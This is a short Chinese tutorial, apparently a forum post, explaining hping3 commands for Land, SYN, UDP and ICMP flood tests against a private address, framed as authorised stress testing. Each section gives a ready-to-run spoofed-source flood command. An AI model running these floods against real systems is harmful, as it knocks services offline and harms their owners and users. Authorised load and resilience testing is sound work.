在 云栈社区 的安全讨论中,hping3 一直是评估网络设备抗压能力的热门工具。它能构造几乎所有类型的探测与攻击报文,用于在授权范围内测试主机或网络的协议栈健壮性。下面整理几种常见的攻击测试命令及原理。
Land 攻击
这种攻击方式会伪造源地址,让目标认为自己给自己发送了连接请求,早期系统可能因此陷入死锁。
hping3 192.168.210.100 -p 445 -S -a 192.168.210.100 --flood
-p:指定端口
-S:发送 SYN 报文
-a:伪造源地址
--flood:泛洪模式
畸形包攻击
通过随机化源地址,向目标发送大量异常的 SYN 报文,干扰其正常处理逻辑。
hping3 192.168.210.100 -p 445 -S --rand-source --flood
--rand-source:伪造随机源 IP 地址
SYN Flood 泛洪攻击
这是最常见的拒绝服务攻击手法。攻击者利用 TCP/IP 三次握手机制,发送海量伪造源地址的 SYN 包,快速耗尽目标的连接队列。
hping3 192.168.210.100 -p 445 -S --rand-source --flood
UDP Flood 泛洪攻击
向目标随机端口发送海量 UDP 报文,迫使设备花费资源处理不可达的 ICMP 回应或检查上层应用。测试前,可先在目标上将 UDP 阈值调整至较低水平,例如 10。
hping3 192.168.210.100 -p 80 --udp --rand-source --flood
ICMP Flood 泛洪攻击
利用海量 ICMP 回显请求淹没目标带宽。同样,为便于观察防护效果,建议先将 ICMP 阈值调低,例如 5。
hping3 192.168.210.100 -p 80 --icmp --rand-source --flood
在进行上述任何攻击性测试时,务必确保拥有明确授权,并妥善配置流量过滤与限速规则,避免波及无关系统。
|